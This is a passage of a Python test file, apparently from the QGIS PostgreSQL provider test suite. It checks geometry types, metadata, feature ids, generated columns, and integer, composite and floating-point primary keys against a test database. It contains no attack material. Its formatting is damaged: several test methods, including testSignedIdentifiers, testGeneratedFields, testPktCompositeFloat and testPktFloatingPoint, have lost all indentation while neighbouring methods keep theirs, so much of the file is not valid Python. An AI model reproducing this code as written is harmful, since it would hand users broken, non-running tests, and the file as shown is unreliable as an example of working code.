        test_table(self.dbconn, 'triangle3d',
                   'PolygonZ ((0 0 0, 1 0 0, 1 1 0, 0 0 0))')
        test_table(self.dbconn, 'tin2d',
                   'MultiPolygon (((0 0, 1 0, 1 1, 0 0)),((0 0, 0 1, 1 1, 0 0)))')
        test_table(self.dbconn, 'tin3d',
                   'MultiPolygonZ (((0 0 0, 1 0 0, 1 1 0, 0 0 0)),((0 0 0, 0 1 0, 1 1 0, 0 0 0)))')
        test_table(self.dbconn, 'ps2d',
                   'MultiPolygon (((0 0, 1 0, 1 1, 0 1, 0 0)))')
        test_table(self.dbconn, 'ps3d',
                   'MultiPolygonZ (((0 0 0, 0 1 0, 1 1 0, 1 0 0, 0 0 0)),((0 0 1, 1 0 1, 1 1 1, 0 1 1, 0 0 1)),((0 0 0, 0 0 1, 0 1 1, 0 1 0, 0 0 0)),((0 1 0, 0 1 1, 1 1 1, 1 1 0, 0 1 0)),((1 1 0, 1 1 1, 1 0 1, 1 0 0, 1 1 0)),((1 0 0, 1 0 1, 0 0 1, 0 0 0, 1 0 0)))')
        test_table(self.dbconn, 'mp3d',
                   'MultiPolygonZ (((0 0 0, 0 1 0, 1 1 0, 1 0 0, 0 0 0)),((0 0 1, 1 0 1, 1 1 1, 0 1 1, 0 0 1)),((0 0 0, 0 0 1, 0 1 1, 0 1 0, 0 0 0)),((0 1 0, 0 1 1, 1 1 1, 1 1 0, 0 1 0)),((1 1 0, 1 1 1, 1 0 1, 1 0 0, 1 1 0)),((1 0 0, 1 0 1, 0 0 1, 0 0 0, 1 0 0)))')
        test_table(self.dbconn, 'pt2d', 'Point (0 0)')
        test_table(self.dbconn, 'pt3d', 'PointZ (0 0 0)')
        test_table(self.dbconn, 'ls2d', 'LineString (0 0, 1 1)')
        test_table(self.dbconn, 'ls3d', 'LineStringZ (0 0 0, 1 1 1)')
        test_table(self.dbconn, 'mpt2d', 'MultiPoint ((0 0),(1 1))')
        test_table(self.dbconn, 'mpt3d', 'MultiPointZ ((0 0 0),(1 1 1))')
        test_table(self.dbconn, 'mls2d',
                   'MultiLineString ((0 0, 1 1),(2 2, 3 3))')
        test_table(self.dbconn, 'mls3d',
                   'MultiLineStringZ ((0 0 0, 1 1 1),(2 2 2, 3 3 3))')
        test_table(self.dbconn, 'pt4d', 'PointZM (1 2 3 4)')
    def testMetadata(self):
        """ Test that metadata is correctly acquired from provider """
        metadata = self.vl.metadata()
        self.assertEqual(
            metadata.crs(), QgsCoordinateReferenceSystem.fromEpsgId(4326))
        self.assertEqual(metadata.type(), 'dataset')
        self.assertEqual(metadata.abstract(), 'QGIS Test Table')
    def testGetFeaturesUniqueId(self):
        """
        Test tables with inheritance for unique ids
        """
        def test_unique(features, num_features):
            # All feature ids must be distinct and the count must match.
            featureids = []
            for f in features:
                self.assertFalse(f.id() in featureids)
                featureids.append(f.id())
            self.assertEqual(len(features), num_features)

        vl = QgsVectorLayer('%s srid=4326 table="qgis_test".%s (geom) sql=' % (self.dbconn, 'someData'), "testgeom",
                            "postgres")
        self.assertTrue(vl.isValid())
        # Test someData
        test_unique([f for f in vl.getFeatures()], 5)

        # Test base_table_bad: layer is invalid
        vl = QgsVectorLayer('%s srid=4326 table="qgis_test".%s (geom) sql=' % (self.dbconn, 'base_table_bad'),
                            "testgeom", "postgres")
        self.assertFalse(vl.isValid())
        # Test base_table_bad with use estimated metadata: layer is valid because the unique test is skipped
        vl = QgsVectorLayer(
            '%s srid=4326 estimatedmetadata="true" table="qgis_test".%s (geom) sql=' % (
                self.dbconn, 'base_table_bad'),
            "testgeom", "postgres")
        self.assertTrue(vl.isValid())

        # Test base_table_good: layer is valid
        vl = QgsVectorLayer('%s srid=4326 table="qgis_test".%s (geom) sql=' % (self.dbconn, 'base_table_good'),
                            "testgeom", "postgres")
        self.assertTrue(vl.isValid())
        test_unique([f for f in vl.getFeatures()], 4)
        # Test base_table_good with use estimated metadata: layer is valid
        vl = QgsVectorLayer(
            '%s srid=4326 estimatedmetadata="true" table="qgis_test".%s (geom) sql=' % (
                self.dbconn, 'base_table_good'),
            "testgeom", "postgres")
        self.assertTrue(vl.isValid())
        test_unique([f for f in vl.getFeatures()], 4)
def testSignedIdentifiers(self):
def test_layer(ql, att, val, fidval):
self.assertTrue(ql.isValid())
features = ql.getFeatures()
att_idx = ql.fields().lookupField(att)
count = 0
for f in features:
count += 1
self.assertEqual(f.attributes()[att_idx], val)
self.assertEqual(f.id(), fidval)
self.assertEqual(count, 1)
def test(dbconn, query, att, val, fidval):
table = query.replace('"', '\\"')
uri = '%s table="%s" (g) key=\'%s\'' % (dbconn, table, att)
ql = QgsVectorLayer(uri, "t", "postgres")
test_layer(ql, att, val, fidval)
# now with estimated metadata
uri += ' estimatedmetadata="true"'
test_layer(ql, att, val, fidval)
# --- INT16 ----
# zero
test(self.dbconn, '(SELECT 0::int2 i, NULL::geometry(Point) g)', 'i', 0, 0)
# low positive
test(self.dbconn, '(SELECT 1::int2 i, NULL::geometry(Point) g)', 'i', 1, 1)
# low negative
test(self.dbconn, '(SELECT -1::int2 i, NULL::geometry(Point) g)',
'i', -1, 4294967295)
# max positive signed 16bit integer
test(self.dbconn, '(SELECT 32767::int2 i, NULL::geometry(Point) g)',
'i', 32767, 32767)
# max negative signed 16bit integer
test(self.dbconn, '(SELECT (-32768)::int2 i, NULL::geometry(Point) g)',
'i', -32768, 4294934528)
# --- INT32 ----
# zero
test(self.dbconn, '(SELECT 0::int4 i, NULL::geometry(Point) g)', 'i', 0, 0)
# low positive
test(self.dbconn, '(SELECT 2::int4 i, NULL::geometry(Point) g)', 'i', 2, 2)
# low negative
test(self.dbconn, '(SELECT -2::int4 i, NULL::geometry(Point) g)',
'i', -2, 4294967294)
# max positive signed 32bit integer
test(self.dbconn, '(SELECT 2147483647::int4 i, NULL::geometry(Point) g)',
'i', 2147483647, 2147483647)
# max negative signed 32bit integer
test(self.dbconn, '(SELECT (-2147483648)::int4 i, NULL::geometry(Point) g)',
'i', -2147483648, 2147483648)
# --- INT64 (FIDs are always 1 because assigned ex-novo) ----
# zero
test(self.dbconn, '(SELECT 0::int8 i, NULL::geometry(Point) g)', 'i', 0, 1)
# low positive
test(self.dbconn, '(SELECT 3::int8 i, NULL::geometry(Point) g)', 'i', 3, 1)
# low negative
test(self.dbconn, '(SELECT -3::int8 i, NULL::geometry(Point) g)', 'i', -3, 1)
# max positive signed 64bit integer
test(self.dbconn, '(SELECT 9223372036854775807::int8 i, NULL::geometry(Point) g)',
'i', 9223372036854775807, 1)
# max negative signed 32bit integer
test(self.dbconn, '(SELECT (-9223372036854775808)::int8 i, NULL::geometry(Point) g)', 'i', -9223372036854775808,
1)
    def testPktIntInsert(self):
        """Inserting with a NULL integer pk through a view assigns a real key."""
        vl = QgsVectorLayer('{} table="qgis_test"."{}" key="pk" sql='.format(self.dbconn, 'bikes_view'), "bikes_view",
                            "postgres")
        self.assertTrue(vl.isValid())
        f = QgsFeature(vl.fields())
        f['pk'] = NULL
        f['name'] = 'Cilo'
        r, f = vl.dataProvider().addFeatures([f])
        self.assertTrue(r)
        # The provider must have filled in the generated primary key.
        self.assertNotEqual(f[0]['pk'], NULL, f[0].attributes())
        # Clean up the inserted row.
        vl.deleteFeatures([f[0].id()])
def testGeneratedFields(self):
"""Test if GENERATED geometry/geography columns are correctly handled by the provider."""
cur = self.con.cursor()
cur.execute("SHOW server_version_num")
pgversion = int(cur.fetchone()[0])
# GENERATED columns are unsupported by PostgreSQL versions earlier than 12.
if pgversion < 120000:
return
# Geometry columns
vl = QgsVectorLayer('{} table="qgis_test"."{}" (geom) srid=4326 type=POLYGON key="id" sql='.format(self.dbconn, "test_gen_col"), "test_gen_col", "postgres")
self.assertTrue(vl.isValid())
# writing geometry...
f = QgsFeature(vl.fields())
ix_name = f.fieldNameIndex('name')
f.setGeometry(QgsGeometry.fromWkt('Polygon ((-67 -2, -67 0, -68 0, -70 -1, -67 -2))'))
f.setAttribute(ix_name, 'QGIS-3')
self.assertTrue(vl.startEditing())
self.assertTrue(vl.addFeatures([f]))
self.assertTrue(vl.commitChanges())
# reading back to see if we saved the centroid correctly.
vl2 = QgsVectorLayer('{} table="qgis_test"."{}" (cent) srid=4326 type=POINT key="id" sql='.format(self.dbconn, "test_gen_col"), "test_gen_col", "postgres")
f2 = next(vl2.getFeatures(QgsFeatureRequest()))
generated_geometry = f2.geometry().asWkt()
expected_geometry = 'Point (-68.047619047619051 -0.90476190476190477)'
expected_area = 43069568296.34387
assert compareWkt(generated_geometry, expected_geometry), "Geometry mismatch! Expected:\n{}\nGot:\n{}\n".format(expected_geometry, generated_geometry)
self.assertAlmostEqual(f2['poly_area'], expected_area, places=4)
self.assertEqual(f2['name'], 'QGIS-3')
# Checking if we can correctly change values of an existing feature.
self.assertTrue(vl2.startEditing())
ix2_name = f2.fieldNameIndex('name')
fid2 = f2.id()
vl2.changeAttributeValue(fid2, ix2_name, 'New')
self.assertTrue(vl2.commitChanges())
# getting a brand new QgsVectorLayer
vl = QgsVectorLayer('{} table="qgis_test"."{}" (geom) srid=4326 type=POLYGON key="id" sql='.format(self.dbconn, "test_gen_col"), "test_gen_col", "postgres")
self.assertTrue(vl.isValid())
# checking if the name field was correctly updated
f = next(vl.getFeatures(QgsFeatureRequest()))
self.assertEqual(f['name'], 'New')
# Now, check if we can change the value of a GENERATED field (we shouldn't)
self.assertTrue(vl.startEditing())
ix_area = f.fieldNameIndex('poly_area')
fid = f.id()
vl.changeAttributeValue(fid, ix_area, 42)
self.assertTrue(vl.commitChanges())
# reading back
vl2 = QgsVectorLayer('{} table="qgis_test"."{}" (geom) srid=4326 type=POLYGON key="id" sql='.format(self.dbconn, "test_gen_col"), "test_gen_col", "postgres")
f2 = next(vl2.getFeatures(QgsFeatureRequest()))
self.assertAlmostEqual(f2['poly_area'], expected_area, places=4)
# now, getting a brand new QgsVectorLayer to check if changes (UPDATE) in the geometry are reflected in the generated fields
vl = QgsVectorLayer('{} table="qgis_test"."{}" (geom) srid=4326 type=POLYGON key="id" sql='.format(self.dbconn, "test_gen_col"), "test_gen_col", "postgres")
self.assertTrue(vl.isValid())
f = next(vl.getFeatures(QgsFeatureRequest()))
vl.startEditing()
fid = f.id()
vl.changeGeometry(fid, QgsGeometry.fromWkt('Polygon ((-67 -2, -65 0, -68 0, -70 -1, -67 -2))'))
vl.commitChanges()
# reading back...
vl2 = QgsVectorLayer('{} table="qgis_test"."{}" (cent) srid=4326 type=POINT key="id" sql='.format(self.dbconn, "test_gen_col"), "test_gen_col", "postgres")
f2 = next(vl2.getFeatures(QgsFeatureRequest()))
generated_geometry = f2.geometry().asWkt()
generated_geometry = f2.geometry().asWkt()
expected_geometry = 'Point (-67.42424242424242209 -0.81818181818181823)'
expected_area = 67718478405.28429
assert compareWkt(generated_geometry, expected_geometry), "Geometry mismatch! Expected:\n{}\nGot:\n{}\n".format(expected_geometry, generated_geometry)
self.assertAlmostEqual(f2['poly_area'], expected_area, places=4)
self.assertEqual(f2['name'], 'New')
# Geography columns
vl3 = QgsVectorLayer('{} table="qgis_test"."{}" (geog) srid=4326 type=POLYGON key="id" sql='.format(self.dbconn, "test_gen_geog_col"), "test_gen_geog_col", "postgres")
self.assertTrue(vl3.isValid())
# writing geography...
f3 = QgsFeature(vl3.fields())
f3.setGeometry(QgsGeometry.fromWkt('Polygon ((-67 -2, -67 0, -68 0, -70 -1, -67 -2))'))
self.assertTrue(vl3.startEditing())
self.assertTrue(vl3.addFeatures([f3]))
self.assertTrue(vl3.commitChanges())
# reading back geography and checking values
vl4 = QgsVectorLayer('{} table="qgis_test"."{}" (cent) srid=4326 type=POINT key="id" sql='.format(self.dbconn, "test_gen_geog_col"), "test_gen_geog_col", "postgres")
f4 = next(vl4.getFeatures(QgsFeatureRequest()))
generated_geometry = f4.geometry().asWkt()
expected_geometry = 'Point (-68.0477406158202 -0.904960604589168)'
expected_area = 43088884296.69713
assert compareWkt(generated_geometry, expected_geometry), "Geometry mismatch! Expected:\n{}\nGot:\n{}\n".format(expected_geometry, generated_geometry)
self.assertEqual(f4['poly_area'], expected_area)
    def testNonPkBigintField(self):
        """Test if we can correctly insert, read and change attributes(fields) of type bigint and which are not PKs."""
        vl = QgsVectorLayer(
            '{} sslmode=disable srid=4326 key="pk" table="qgis_test".{} (geom)'.format(
                self.dbconn, 'bigint_pk'),
            "bigint_pk", "postgres")
        self.assertTrue(vl.isValid())
        flds = vl.fields()
        # check if default values are correctly read back
        f = next(vl.getFeatures(QgsFeatureRequest()))
        bigint_with_default_idx = vl.fields().lookupField('bigint_attribute_def')
        self.assertEqual(f.attributes()[bigint_with_default_idx], 42)
        # check if NULL values are correctly read
        bigint_def_null_idx = vl.fields().lookupField('bigint_attribute')
        self.assertEqual(f.attributes()[bigint_def_null_idx], NULL)
        # check if we can overwrite a default value
        vl.startEditing()
        vl.changeAttributeValue(f.id(), bigint_with_default_idx, 43)
        # remember the PK of the edited row so we can find it again after re-opening
        pkidx = vl.fields().lookupField('pk')
        editedid = f.attributes()[pkidx]
        self.assertTrue(vl.commitChanges())
        # re-open the layer from scratch to be sure the change was written to the backend
        vl2 = QgsVectorLayer(
            '{} sslmode=disable srid=4326 key="pk" table="qgis_test".{} (geom)'.format(
                self.dbconn, 'bigint_pk'),
            "bigint_pk", "postgres")
        flds = vl2.fields()
        self.assertTrue(vl2.isValid())
        f = next(vl2.getFeatures(
            QgsFeatureRequest().setFilterExpression('pk = ' + str(editedid))))
        bigint_with_default_idx = vl2.fields().lookupField('bigint_attribute_def')
        self.assertEqual(f.attributes()[bigint_with_default_idx], 43)
        # check if we can insert a new value
        dp = vl2.dataProvider()
        # evaluate default clauses client-side so defaultValue() yields concrete values
        dp.setProviderProperty(QgsDataProvider.EvaluateDefaultValues, 1)
        pkidx = vl2.fields().lookupField('pk')
        vl2.startEditing()
        f = QgsFeature(vl2.fields())
        f['pk'] = NULL
        f['value'] = 'The answer.'
        f['bigint_attribute'] = 84
        f.setAttribute(pkidx, vl2.dataProvider().defaultValue(pkidx))
        f.setAttribute(bigint_with_default_idx,
                       vl2.dataProvider().defaultValue(bigint_with_default_idx))
        r, f = vl2.dataProvider().addFeatures([f])
        self.assertTrue(r)
        vl2.commitChanges()
        # fetch the inserted row back via its generated PK and verify both bigint fields
        inserted_id = f[0]['pk']
        f = next(vl2.getFeatures(
            QgsFeatureRequest().setFilterExpression('pk = ' + str(inserted_id))))
        self.assertEqual(f['bigint_attribute'], 84)
        self.assertEqual(f['bigint_attribute_def'], 42)
    def testPktUpdateBigintPk(self):
        """Test if we can update objects with positive, zero and negative bigint PKs."""
        vl = QgsVectorLayer(
            '{} sslmode=disable srid=4326 key="pk" table="qgis_test".{} (geom)'.format(
                self.dbconn, 'bigint_pk'),
            "bigint_pk", "postgres")
        flds = vl.fields()
        self.assertTrue(vl.isValid())
        vl.startEditing()
        # one slot per expected row; -1 = not seen, 0 = edited, 1 = verified after re-open
        statuses = [-1, -1, -1, -1]
        # changing values...
        for ft in vl.getFeatures():
            if ft['value'] == 'first value':
                vl.changeAttributeValue(
                    ft.id(), flds.indexOf('value'), '1st value')
                statuses[0] = 0
            elif ft['value'] == 'second value':
                vl.changeAttributeValue(
                    ft.id(), flds.indexOf('value'), '2nd value')
                statuses[1] = 0
            elif ft['value'] == 'zero value':
                vl.changeAttributeValue(
                    ft.id(), flds.indexOf('value'), '0th value')
                statuses[2] = 0
            elif ft['value'] == 'negative value':
                vl.changeAttributeValue(
                    ft.id(), flds.indexOf('value'), '-1th value')
                statuses[3] = 0
        self.assertTrue(vl.commitChanges())
        # every one of the four rows must have been found and edited
        self.assertTrue(all(x == 0 for x in statuses))
        # now, let's see if the values were changed
        vl2 = QgsVectorLayer(
            '{} sslmode=disable srid=4326 key="pk" table="qgis_test".{} (geom)'.format(
                self.dbconn, 'bigint_pk'),
            "bigint_pk", "postgres")
        self.assertTrue(vl2.isValid())
        for ft in vl2.getFeatures():
            if ft['value'] == '1st value':
                statuses[0] = 1
            elif ft['value'] == '2nd value':
                statuses[1] = 1
            elif ft['value'] == '0th value':
                statuses[2] = 1
            elif ft['value'] == '-1th value':
                statuses[3] = 1
        self.assertTrue(all(x == 1 for x in statuses))
def testPktUpdateBigintPkNonFirst(self):
"""Test if we can update objects with positive, zero and negative bigint PKs in tables whose PK is not the first field"""
vl = QgsVectorLayer('{} sslmode=disable srid=4326 key="pk" table="qgis_test".{} (geom)'.format(self.dbconn,
'bigint_non_first_pk'),
"bigint_non_first_pk", "postgres")
flds = vl.fields()
self.assertTrue(vl.isValid())
vl.startEditing()
statuses = [-1, -1, -1, -1]
# changing values...
for ft in vl.getFeatures():
if ft['value'] == 'first value':
vl.changeAttributeValue(
ft.id(), flds.indexOf('value'), '1st value')
statuses[0] = 0
elif ft['value'] == 'second value':
vl.changeAttributeValue(
ft.id(), flds.indexOf('value'), '2nd value')
statuses[1] = 0
elif ft['value'] == 'zero value':
vl.changeAttributeValue(
ft.id(), flds.indexOf('value'), '0th value')
statuses[2] = 0
elif ft['value'] == 'negative value':
vl.changeAttributeValue(
ft.id(), flds.indexOf('value'), '-1th value')
statuses[3] = 0
self.assertTrue(vl.commitChanges())
self.assertTrue(all(x == 0 for x in statuses))
# now, let's see if the values were changed
vl2 = QgsVectorLayer(
'{} sslmode=disable srid=4326 key="pk" table="qgis_test".{} (geom)'.format(
self.dbconn, 'bigint_pk'),
"bigint_pk_nonfirst", "postgres")
self.assertTrue(vl2.isValid())
for ft in vl2.getFeatures():
if ft['value'] == '1st value':
statuses[0] = 1
elif ft['value'] == '2nd value':
statuses[1] = 1
elif ft['value'] == '0th value':
statuses[2] = 1
elif ft['value'] == '-1th value':
statuses[3] = 1
self.assertTrue(all(x == 1 for x in statuses))
    def testPktComposite(self):
        """
        Check that tables with PKs composed of many fields of different types are correctly read and written to
        """
        vl = QgsVectorLayer('{} sslmode=disable srid=4326 key=\'"pk1","pk2"\' table="qgis_test"."tb_test_compound_pk" (geom)'.format(self.dbconn), "test_compound", "postgres")
        self.assertTrue(vl.isValid())
        fields = vl.fields()
        f = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression('pk1 = 1 AND pk2 = 2')))
        # first of all: we must be able to fetch a valid feature
        self.assertTrue(f.isValid())
        self.assertEqual(f['pk1'], 1)
        self.assertEqual(f['pk2'], 2)
        self.assertEqual(f['value'], 'test 2')
        # can we edit a field?
        vl.startEditing()
        vl.changeAttributeValue(f.id(), fields.indexOf('value'), 'Edited Test 2')
        self.assertTrue(vl.commitChanges())
        # Did we get it right? Let's create a new QgsVectorLayer and try to read back our changes:
        vl2 = QgsVectorLayer('{} sslmode=disable srid=4326 table="qgis_test"."tb_test_compound_pk" (geom) key=\'"pk1","pk2"\' '.format(self.dbconn), "test_compound2", "postgres")
        self.assertTrue(vl2.isValid())
        f2 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression('pk1 = 1 AND pk2 = 2')))
        self.assertTrue(f2.isValid())
        # Then, making sure we really did change our value.
        self.assertEqual(f2['value'], 'Edited Test 2')
        # How about inserting a new feature? (pk2 is near the bigint lower bound on purpose)
        f3 = QgsFeature(vl2.fields())
        f3['pk1'] = 4
        f3['pk2'] = -9223372036854775800
        f3['value'] = 'other test'
        vl.startEditing()
        res, f3 = vl.dataProvider().addFeatures([f3])
        self.assertTrue(res)
        self.assertTrue(vl.commitChanges())
        # can we catch it on another layer?
        f4 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression('pk2 = -9223372036854775800')))
        self.assertTrue(f4.isValid())
        expected_attrs = [4, -9223372036854775800, 'other test']
        self.assertEqual(f4.attributes(), expected_attrs)
        # Finally, let's delete one of the features.
        f5 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression('pk1 = 2 AND pk2 = 1')))
        vl2.startEditing()
        vl2.deleteFeatures([f5.id()])
        self.assertTrue(vl2.commitChanges())
        # did we really delete? Let's try to get the deleted feature from the first layer.
        f_iterator = vl.getFeatures(QgsFeatureRequest().setFilterExpression('pk1 = 2 AND pk2 = 1'))
        # the iterator may either yield nothing (StopIteration) or an invalid feature
        got_feature = True
        try:
            f6 = next(f_iterator)
            got_feature = f6.isValid()
        except StopIteration:
            got_feature = False
        self.assertFalse(got_feature)
def testPktCompositeFloat(self):
"""
Check that tables with PKs composed of many fields of different types are correctly read and written to
"""
vl = QgsVectorLayer('{} sslmode=disable srid=4326 key=\'"pk1","pk2","pk3"\' table="qgis_test"."tb_test_composite_float_pk" (geom)'.format(self.dbconn), "test_composite_float", "postgres")
self.assertTrue(vl.isValid())
fields = vl.fields()
f = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk3 = '3.14159274'")))
# first of all: we must be able to fetch a valid feature
self.assertTrue(f.isValid())
self.assertEqual(f['pk1'], 1)
self.assertEqual(f['pk2'], 2)
self.assertAlmostEqual(f['pk3'], 3.14159274)
self.assertEqual(f['value'], 'test 2')
# can we edit a field?
vl.startEditing()
vl.changeAttributeValue(f.id(), fields.indexOf('value'), 'Edited Test 2')
self.assertTrue(vl.commitChanges())
# Did we get it right? Let's create a new QgsVectorLayer and try to read back our changes:
vl2 = QgsVectorLayer('{} sslmode=disable srid=4326 key=\'"pk1","pk2","pk3"\' table="qgis_test"."tb_test_composite_float_pk" (geom)'.format(self.dbconn), "test_composite_float2", "postgres")
self.assertTrue(vl2.isValid())
f2 = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk3 = '3.14159274'")))
self.assertTrue(f2.isValid())
# just making sure we have the correct feature
self.assertAlmostEqual(f2['pk3'], 3.14159274)
# Then, making sure we really did change our value.
self.assertEqual(f2['value'], 'Edited Test 2')
# How about inserting a new field?
f3 = QgsFeature(vl2.fields())
f3['pk1'] = 4
f3['pk2'] = -9223372036854775800
f3['pk3'] = 7.29154
f3['value'] = 'other test'
vl.startEditing()
res, f3 = vl.dataProvider().addFeatures([f3])
self.assertTrue(res)
self.assertTrue(vl.commitChanges())
# can we catch it on another layer?
f4 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression("pk2 = '-9223372036854775800'")))
self.assertTrue(f4.isValid())
expected_attrs = [4, -9223372036854775800, 7.29154, 'other test']
gotten_attrs = [f4['pk1'], f4['pk2'], f4['pk3'], f4['value']]
self.assertEqual(gotten_attrs[0], expected_attrs[0])
self.assertEqual(gotten_attrs[1], expected_attrs[1])
self.assertAlmostEqual(gotten_attrs[2], expected_attrs[2], places=4)
self.assertEqual(gotten_attrs[3], expected_attrs[3])
# Finally, let's delete one of the features.
f5 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression("pk3 = '7.29154'")))
vl2.startEditing()
vl2.deleteFeatures([f5.id()])
self.assertTrue(vl2.commitChanges())
# did we really delete?
f_iterator = vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk3 = '7.29154'"))
got_feature = True
try:
f6 = next(f_iterator)
got_feature = f6.isValid()
except StopIteration:
got_feature = False
self.assertFalse(got_feature)
def testPktFloatingPoint(self):
"""
Check if we can handle floating point/numeric primary keys correctly
"""
# 1. 32 bit float (PostgreSQL "REAL" type)
vl = QgsVectorLayer(self.dbconn + ' sslmode=disable srid=4326 key="pk" table="qgis_test"."tb_test_float_pk" (geom)', "test_float_pk", "postgres")
self.assertTrue(vl.isValid())
# 1.1. Retrieving
f = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '3.141592653589793238462643383279502884197169'")))
self.assertTrue(f.isValid())
self.assertEqual(f['value'], 'first teste')
# 1.2. Editing
self.assertTrue(vl.startEditing())
vl.changeAttributeValue(f.id(), vl.fields().indexOf('value'), 'Changed first')
self.assertTrue(vl.commitChanges())
# 1.2.1. Checking edit from another vector layer
vl2 = QgsVectorLayer(self.dbconn + ' sslmode=disable srid=4326 key="pk1" table="qgis_test"."tb_test_float_pk" (geom)', "test_float_pk2", "postgres")
self.assertTrue(vl2.isValid())
f2 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '3.141592653589793238462643383279502884197169'")))
self.assertTrue(f2.isValid())
self.assertEqual(f2['value'], 'Changed first')
# 1.3. Deleting
f = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '2.718281828459045235360287471352662497757247'")))
vl.startEditing()
vl.deleteFeatures([f.id()])
self.assertTrue(vl.commitChanges())
# 1.3.1. Checking deletion
f_iterator = vl2.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '2.718281828459045235360287471352662497757247'"))
got_feature = True
try:
f2 = next(f_iterator)
got_feature = f2.isValid()
except StopIteration:
got_feature = False
self.assertFalse(got_feature)
# 1.4. Inserting new feature
newpointwkt = 'Point(-47.751 -15.644)'
f = QgsFeature(vl.fields())
f['pk'] = 0.22222222222222222222222
f['value'] = 'newly inserted'
f.setGeometry(QgsGeometry.fromWkt(newpointwkt))
vl.startEditing()
res, f = vl.dataProvider().addFeatures([f])
self.assertTrue(res)
self.assertTrue(vl.commitChanges())
# 1.4.1. Checking insertion
f2 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '0.22222222222222222222222'")))
self.assertTrue(f2.isValid())
self.assertAlmostEqual(f2['pk'], 0.2222222222222222)
self.assertEqual(f2['value'], 'newly inserted')
assert compareWkt(f2.geometry().asWkt(), newpointwkt), "Geometry mismatch. Expected: {} Got: {} \n".format(f2.geometry().asWkt(), newpointwkt)
# One more check: can we retrieve the same row with the value that we got from this layer?
floatpk = f2['pk']
f3 = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '{}'".format(floatpk))))
self.assertTrue(f3.isValid())
self.assertEqual(f3['value'], 'newly inserted')
self.assertEqual(f3['pk'], floatpk)
# 2. 64 bit float (PostgreSQL "DOUBLE PRECISION" type)
vl = QgsVectorLayer(self.dbconn + ' sslmode=disable srid=4326 key="pk" table="qgis_test"."tb_test_double_pk" (geom)', "test_double_pk", "postgres")
self.assertTrue(vl.isValid())
# 2.1. Retrieving
f = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '3.141592653589793238462643383279502884197169'")))
self.assertTrue(f.isValid())
self.assertEqual(f['value'], 'first teste')
# 2.2. Editing
self.assertTrue(vl.startEditing())
vl.changeAttributeValue(f.id(), vl.fields().indexOf('value'), 'Changed first')
self.assertTrue(vl.commitChanges())
# 2.2.1. Checking edit from another vector layer
vl2 = QgsVectorLayer(self.dbconn + ' sslmode=disable srid=4326 key="pk" table="qgis_test"."tb_test_double_pk" (geom)', "test_double_pk2", "postgres")
self.assertTrue(vl2.isValid())
f2 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '3.141592653589793238462643383279502884197169'")))
self.assertTrue(f2.isValid())
self.assertEqual(f2['value'], 'Changed first')
# 2.3. Deleting
f = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '2.718281828459045235360287471352662497757247'")))
vl.startEditing()
vl.deleteFeatures([f.id()])
self.assertTrue(vl.commitChanges())
# 2.3.1. Checking deletion
f_iterator = vl2.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '2.718281828459045235360287471352662497757247'"))
got_feature = True
try:
f2 = next(f_iterator)
got_feature = f2.isValid()
except StopIteration:
got_feature = False
self.assertFalse(got_feature)
# 2.4. Inserting new feature
newpointwkt = 'Point(-47.751 -15.644)'
f = QgsFeature(vl.fields())
f['pk'] = 0.22222222222222222222222
f['value'] = 'newly inserted'
f.setGeometry(QgsGeometry.fromWkt(newpointwkt))
vl.startEditing()
res, f = vl.dataProvider().addFeatures([f])
self.assertTrue(res)
self.assertTrue(vl.commitChanges())
# 2.4.1. Checking insertion
f2 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '0.22222222222222222222222'")))
self.assertTrue(f2.isValid())
self.assertAlmostEqual(f2['pk'], 0.2222222222222222, places=15)
self.assertEqual(f2['value'], 'newly inserted')
assert compareWkt(f2.geometry().asWkt(), newpointwkt), "Geometry mismatch. Expected: {} Got: {} \n".format(f2.geometry().asWkt(), newpointwkt)
# One more check: can we retrieve the same row with the value that we got from this layer?
doublepk = f2['pk']
f3 = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '{}'".format(doublepk))))
self.assertTrue(f3.isValid())
self.assertEqual(f3['value'], 'newly inserted')
self.assertEqual(f3['pk'], doublepk)
# no NUMERIC/DECIMAL checks here. NUMERIC primary keys are unsupported.
# TODO: implement NUMERIC primary keys/arbitrary precision arithmethics/fixed point math in QGIS.
def testPktMapInsert(self):
vl = QgsVectorLayer('{} table="qgis_test"."{}" key="obj_id" sql='.format(self.dbconn, 'oid_serial_table'),
"oid_serial", "postgres")
self.assertTrue(vl.isValid())
f = QgsFeature(vl.fields())
f['obj_id'] = vl.dataProvider().defaultValueClause(0)
f['name'] = 'Test'
r, f = vl.dataProvider().addFeatures([f])
self.assertTrue(r)
self.assertNotEqual(f[0]['obj_id'], NULL, f[0].attributes())
vl.deleteFeatures([f[0].id()])
    def testNull(self):
        """
        Asserts that 0, '' and NULL are treated as different values on insert
        """
        vl = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'gid\' table="qgis_test"."constraints" sql=', 'test1',
                            'postgres')
        self.assertTrue(vl.isValid())
        QgsProject.instance().addMapLayer(vl)
        tg = QgsTransactionGroup()
        tg.addLayer(vl)
        vl.startEditing()

        def onError(message):
            """We should not get here. If we do, fail and say why"""
            self.assertFalse(True, message)

        vl.raiseError.connect(onError)

        # insert a row with falsy — but NOT NULL — values
        f = QgsFeature(vl.fields())
        f['gid'] = 100
        f['val'] = 0
        f['name'] = ''
        self.assertTrue(vl.addFeature(f))
        # the stored values must round-trip as 0 and '' rather than collapsing to NULL
        feature = next(vl.getFeatures('"gid" = 100'))
        self.assertEqual(f['val'], feature['val'])
